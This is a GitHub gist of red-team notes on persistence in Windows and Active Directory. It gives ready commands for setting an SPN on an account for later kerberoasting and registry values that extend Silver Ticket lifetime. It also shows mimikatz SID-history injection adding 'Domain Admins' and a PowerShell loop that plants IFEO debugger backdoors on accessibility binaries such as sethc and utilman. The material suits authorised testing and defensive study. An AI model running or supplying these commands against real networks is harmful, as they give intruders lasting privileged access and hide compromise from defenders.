Skip to content

Instantly share code, notes, and snippets.

@vestjoe

vestjoe/persistence.md

Last active August 26, 2019 17:46
Show Gist options
  • Save vestjoe/6437481c346982a0a47bdede2281b861 to your computer and use it in GitHub Desktop.
Save vestjoe/6437481c346982a0a47bdede2281b861 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
persistence.md

Misc persistence techniques

Set User SPN for future kerberoast attacks

Set a SPN on a user account to provide to regain password to account that was changed.

Example

setspn -S MSSQLSvc/myhost.redmond.microsoft.com:1433 redmond\accountname

Extend Silver Ticket Lifetime

  1. Create Silver Ticket
  2. Extend the lifetime past the default 30 days
HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1

Stops the Netlogon service from changing a machine’s password

HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge

Set how often to rotate the local password (default 30 days)

Sid History Injection

Reference : https://adsecurity.org/?page_id=1821

mimikatz sid::patch
mimikatz sid::add /sam:karl.watkins /new:"Domain Admins"
mimikatz sid::add /sam:"Domain Users" /new:"Domain Admins"

Oldies but googies

IFEO Options

$bins = @("sethc.exe", "utilman.exe", "osk.exe", "Magnify.exe", "Narrator.exe", "DisplaySwitch.exe", "AtBroker.exe")
foreach($binname in $bins) {
    New-Item -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$binname"
    New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$binname" -Name "Debugger" -Value 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert("Follow @cptjesus on twitter")'
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment